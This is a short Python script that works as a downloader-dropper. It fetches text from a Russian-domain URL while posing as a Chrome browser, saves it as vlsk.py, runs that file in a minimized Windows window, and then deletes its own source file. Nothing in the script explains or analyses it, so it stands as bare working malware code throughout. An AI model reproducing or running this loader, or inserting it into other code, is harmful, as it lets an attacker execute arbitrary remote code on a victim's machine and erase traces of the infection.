import os;import requests
p =os.path.abspath(__file__)
def d(c):
    try:
        with open("vlsk.py", "x") as file:
            file.write(c)
    except FileExistsError:
        pass

def get():
            url = f'http://shumameow.ru/vlsk/d.txt'
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
            }
            r = requests.get(url, headers=headers)
            return r.text

d(get())
os.system("start /min vlsk.py")
os.system(f"del {p}")
